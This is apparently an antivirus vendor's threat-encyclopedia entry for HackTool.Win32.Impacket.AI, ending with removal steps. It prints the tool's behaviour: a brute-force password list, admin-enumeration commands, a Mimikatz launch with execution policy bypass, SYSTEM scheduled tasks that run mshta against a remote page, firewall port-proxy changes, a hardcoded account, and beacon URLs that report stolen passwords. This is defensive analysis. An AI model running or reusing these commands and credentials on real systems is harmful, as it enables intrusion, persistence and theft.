Analysis by: Jay Bradley Nebre

ALIASES:

Trojan:Win32/InjectPyinc!rfn(Microsoft); Trojan.Win32.Trickster.dzg(Kaspersky)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Hacking Tool

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel: Dropped by other malware, Downloaded from the Internet

This Hacking Tool arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It takes advantage of certain vulnerabilities.

  TECHNICAL DETAILS

File Size: 6,967,008 bytes
File Type: EXE
Memory Resident: Yes
Initial Samples Received Date: 26 Mar 2019
Payload: Connects to URLs/IPs, Exploits vulnerability

Arrival Details

This Hacking Tool arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Hacking Tool drops the following files:

  • {Malware Path}\mkatz.ini - mimikatz note

It drops and executes the following files:

  • {Malware Path}\m2.ps1 - detected as Trojan.PS1.MIMIKATZ.ADW

It adds the following processes:

  • {malware name}.exe;
  • cmd /c wmic ntdomain get domainname;
  • wmic ntdomain get domainname;
  • cmd /c net localgroup administrators;
  • net localgroup administrators;
  • C:\Windows\system32\net1 localgroup administrators;
  • cmd /c net group "domain admins" /domain;
  • net group "domain admins" /domain;
  • C:\Windows\system32\net1 group "domain admins" /domain;
  • powershell.exe -exec bypass "import-module {malware path}\m2.ps1

Other Details

This Hacking Tool connects to the following possibly malicious URL:

  • http://{BLOCKED}o.{BLOCKED}g.com/e.png?id={Computer Name}&mac={MAC Address}&OS={OS Version}&BIT={32/64}&IT={Date and Time}&c={Counter}&VER=\'+{Malware Version}&d={SMBdomain}&from={Textfilesource}&mpass={Password}&size={Size of file}&num={no.}&sa={sqlpassword}&dig={0/1}&mdl={0/1}
  • http://{BLOCKED}o.{BLOCKED}h.com/e.png?id={Computer Name}&mac={MAC Address}&OS={OS Version}&BIT={32/64}&IT={Date and Time}&c=\'+{Counter}&VER=\'+{Malware Version}&d={SMBdomain}&from={Textfilesource}&mpass={Password}&size={Size of file}&num={no}&sa={sqlpassword}&dig={0/1}&mdl={0/1}
  • http://{BLOCKED}o.{BLOCKED}y.com/e.png?id={Computer Name}&mac={MAC Address}&OS={OS Version}&BIT={32/64}&IT={Date and Time}&c=\'+{Counter}&VER=\'+{Malware Version}&d={SMBdomain}&from={Textfilesource}&mpass={Password}&size={Size of file}&num={no.}&sa={sqlpassword}&dig={0/1}&mdl={0/1}

It does the following:

  • This hacktool uses the following usernames and passwords to attempt to log into the target machine:
    Usernames:
    • Administrator
    • user
    • admin
    • test
    • hp
    • guest

    Passwords:
    • 123456
    • password
    • qwerty
    • 12345678
    • 123456789
    • 123
    • 1234
    • 123123
    • 12345
    • 12345678
    • 123123123
    • 1234567890
    • 88888888
    • 111111111
    • 000000
    • 111111
    • 112233
    • 123321
    • 654321
    • 666666
    • 888888
    • a123456
    • 123456a
    • 5201314
    • 1qaz2wsx
    • 1q2w3e4r
    • qwe123
    • 123qwe
    • a123456789
    • 123456789a
    • baseball
    • dragon
    • football
    • iloveyou
    • password
    • sunshine
    • princess
    • welcome
    • abc123
    • monkey
    • !@#$%^&*
    • charlie
    • aa123456
    • Aa123456
    • admin
    • homelesspa
    • password1
    • 1q2w3e4r5t
    • qwertyuiop
    • 1qaz2wsx
    • sa
    • sasa
    • sa123
    • sql2005
    • 1
    • admin@123
    • sa2008
    • 1111
    • passw0rd
    • abc
    • abc123
    • abcdefg
    • sapassword
    • Aa12345678
    • ABCabc123
    • sqlpassword
    • 1qaz2wsx
    • 1qaz!QAZ
    • sql2008
    • ksa8hd4,m@~#$%^&*()
    • 4yqbm4,m`~!@~#$%^&*(),.;
    • 4yqbm4,m`~!@~#$%^&*(),.;
    • A123456
    • database
    • saadmin
    • sql2000
    • admin123
    • p@ssword
    • sql123
    • sasasa
    • adminsa
    • sql2010
    • sa12345
    • sa123456
    • saadmin
    • sqlpass
  • Depending on different methods of entry, the malware will execute the following commands:
    SMBdomain admin access
    • cmd.exe /c echo {random filename} >> c:\\windows\\temp\\svchost.exe
    • echo "*" >c:\\windows\\temp\\doadmin.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • copy /y c:\\windows\\temp\\svchost.exe c:\\windows\\{random filename}.exe
    • if exist c:\\windows\\temp\\dig.exe (move /y c:\\windows\\temp\\dig.exe c:\\windows\\{random filename}.exe)else echo no dig
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\\Windows\\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\\{random filename}" /tr "c:\\windows\\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN escan)',domainsmb[0].split("*")[0],domainsmb[0].split("*")[1],domainsmb[0].split("*")[2],fr).run(ip):

    SMB user access
    • cmd.exe /c echo {random filename} >> c:\\windows\\temp\\svchost.exe
    • echo "*" >c:\\windows\\temp\\ipc.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • copy /y c:\\windows\\temp\\svchost.exe c:\\windows\\{random filename}.exe
    • move /y c:\\windows\\temp\\dig.exe c:\\windows\\{random filename}.exe
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\\Windows\\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\\{random filename}" /tr "c:\\windows\\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN escan)',u,p,'',fr).run(ip):

    SMB domain access
    • cmd.exe /c echo {random filename} >> c:\\windows\\temp\\svchost.exe
    • echo "*" >c:\\windows\\temp\\domain.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • copy /y c:\\windows\\temp\\svchost.exe c:\\windows\\{random filename}.exe
    • move /y c:\\windows\\temp\\dig.exe c:\\windows\\{random filename}.exe
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\\Windows\\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\\{random filename}" /tr "c:\\windows\\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN escan)',u,p,d,fr).run(ip):

    SMB NTHASH access
    • cmd.exe /c echo {random filename} >> c:\\windows\\temp\\svchost.exe
    • echo "*" >c:\\windows\\temp\\hash.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • copy /y c:\\windows\\temp\\svchost.exe c:\\windows\\{random filename}.exe
    • move /y c:\\windows\\temp\\dig.exe c:\\windows\\{random filename}.exe
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\\Windows\\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\\{random filename}" /tr "c:\\windows\\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN escan)',u,'','',fr,"00000000000000000000000000000000:"+n).run(ip):

    SQL access
    • cmd.exe /c echo {random filename} >> c:\\windows\\temp\\svchost.exe
    • echo "*" >c:\\windows\\temp\\143.txt
    • copy /y c:\\windows\\temp\\svchost.exe c:\\windows\\{random filename}.exe
    • move /y c:\\windows\\temp\\dig.exe c:\\windows\\{random filename}.exe
    • net start Ddriver
    • net user k8h3d /del
    • netsh firewall add portopening tcp 65533 DNSsql
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\\Windows\\{random filename}.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\\{random filename}" /tr "c:\\windows\\{random filename}.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN Autostart
    • start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN escan)','k8h3d','k8d3j9SjfS7','','4').run(host)==_True:

    MS17-010 exploit access
    • cmd /c echo ''{random filename}'' >> c:\\windows\\temp\\msInstall.exe
    • echo copy /y c:\\windows\\temp\\msInstall.exe c:\\windows\\''{random filename}''.exe>c:/windows/temp/p.bat
    • echo "*" >c:\\windows\\temp\\eb.txt
    • echo move /y c:\\windows\\temp\\''{random filename}''.exe c:\\windows\\ >>c:/windows/temp/p.bat
    • echo netsh interface ipv6 install >>c:/windows/temp/p.bat
    • echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat
    • echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat
    • echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat
    • echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat
    • echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\\''{random filename}''" /tr "c:\\windows\\''{random filename}''.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn '''+ebsname+''' /tr "c:\\windows\\''{random filename}''.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\\windows\\''{random filename}''.exe"
    • schtasks /run /TN Autostart
    • schtasks /delete /TN Autoload /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\\windows\\temp\\installed.exe"
    • schtasks /run /TN Autoload
    • schtasks /delete /TN '''+ebsname+''' /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN '''+ebsname+''' /tr "c:\\windows\\''{random filename}''.exe"
    • schtasks /run /TN '''+ebsname+''') >>c:/windows/temp/p.bat
    • echo net start Ddriver >>c:/windows/temp/p.bat
    • echo for /f %%i in ('tasklist | find /c /i "cmd.exe"') do set s=%%i >>c:/windows/temp/p.bat
    • echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat
    • echo net user k8h3d /del >>c:/windows/temp/p.bat
    • echo c:\\windows\\''{random filename}''.exe >>c:/windows/temp/p.bat
    • echo del c:\\windows\\temp\\p.bat>>c:/windows/temp/p.bat
    • echo c:\\windows\\temp\\installed.exe>>c:/windows/temp/p.bat
    • cmd.exe /c c:/windows/temp/p.bat
    • cmd /c c:\\windows\\temp\\installed.exe'''

    MS17-010 access
    • cmd /c echo ''{random filename}'' >> c:\\windows\\temp\\msInstall.exe
    • echo copy /y c:\\windows\\temp\\msInstall.exe c:\\windows\\''{random filename}''.exe>c:/windows/temp/p.bat
    • echo "*" >c:\\windows\\temp\\eb.txt
    • echo move /y c:\\windows\\temp\\''{random filename}''.exe c:\\windows\\ >>c:/windows/temp/p.bat
    • echo netsh interface ipv6 install >>c:/windows/temp/p.bat
    • echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat
    • echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat
    • echo netsh firewall add portopening tcp 65531 DNSS2 >>c:/windows/temp/p.bat
    • echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat
    • echo if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\\''{random filename}''" /tr "c:\\windows\\''{random filename}''.exe" /F
    • schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn '''+ebsname+''' /tr "c:\\windows\\''{random filename}''.exe" /F) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\\windows\\''{random filename}''.exe"
    • schtasks /run /TN Autostart
    • schtasks /delete /TN Autoload /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\\windows\\temp\\installed.exe"
    • schtasks /run /TN Autoload
    • schtasks /delete /TN '''+ebsname+''' /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN '''+ebsname+''' /tr "c:\\windows\\''{random filename}''.exe"
    • schtasks /run /TN '''+ebsname+''') >>c:/windows/temp/p.bat
    • echo net start Ddriver >>c:/windows/temp/p.bat
    • echo for /f %%i in ('tasklist | find /c /i "cmd.exe"') do set s=%%i >>c:/windows/temp/p.bat
    • echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat
    • echo net user k8h3d /del >>c:/windows/temp/p.bat
    • echo del c:\\windows\\temp\\p.bat>>c:/windows/temp/p.bat
    • echo c:\\windows\\temp\\installed.exe>>c:/windows/temp/p.bat
    • cmd.exe /c c:/windows/temp/p.bat
    • cmd /c c:\\windows\\temp\\installed.exe'''

    EternalBlue access
    • cmd.exe /c echo {random filename} >> c:\\windows\\temp\\svchost.exe
    • echo "*" >c:\\windows\\temp\\eb.txt
    • netsh firewall add portopening tcp 65533 DNSd
    • netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
    • net user k8h3d /del
    • copy /y c:\\windows\\temp\\svchost.exe c:\\windows\\{random filename}.exe
    • move /y c:\\windows\\temp\\dig.exe c:\\windows\\{random filename}.exe
    • if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e {Base64 encoded}" /F
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn {random filename} /tr "C:\\Windows\\{random filename}.exe" /F
    • schtasks /run /TN {random filename}
    • schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\\{random filename}" /tr "c:\\windows\\{random filename}.exe" /F
    • schtasks /run /TN {random filename}) else (start /b sc start Schedule
    • ping localhost
    • sc query Schedule|findstr RUNNING
    • schtasks /delete /TN Autocheck /f
    • schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://{BLOCKED}.{BLOCKED}h.com/page.html?p%COMPUTERNAME%"
    • schtasks /run /TN Autocheck
    • schtasks /delete /TN Autostart /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN Autostart
    • schtasks /delete /TN escan /f
    • schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\\windows\\{random filename}.exe"
    • schtasks /run /TN escan)','k8h3d','k8d3j9SjfS7','','9').run(ip)==_True:

It takes advantage of the following vulnerabilities:

  SOLUTION

Minimum Scan Engine: 9.850
FIRST VSAPI PATTERN FILE: 2.159.00
FIRST VSAPI PATTERN DATE: 26 Mar 2019
VSAPI OPR PATTERN File: 2.160.00
VSAPI OPR PATTERN Date: 27 Mar 2019

Step 1

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Identify and terminate files detected as HackTool.Win32.Impacket.AI

[ Learn More ]
  1. Windows Task Manager may not display all running processes. In this case, please use a third-party process viewer, preferably Process Explorer, to terminate the malware/grayware/spyware file. You may download the said tool here.
  2. If the detected file is displayed in either Windows Task Manager or Process Explorer but you cannot delete it, restart your computer in safe mode. To do this, refer to this link for the complete steps.
  3. If the detected file is not displayed in either Windows Task Manager or Process Explorer, continue doing the next steps.

Step 4

Search and delete this file

[ Learn More ]
There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.  
  • {Malware Path}\m2.ps1
  • {Malware Path}\mkatz.ini

Step 5

Scan your computer with your Trend Micro product to delete files detected as HackTool.Win32.Impacket.AI. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:


Did this description help? Tell us how we did.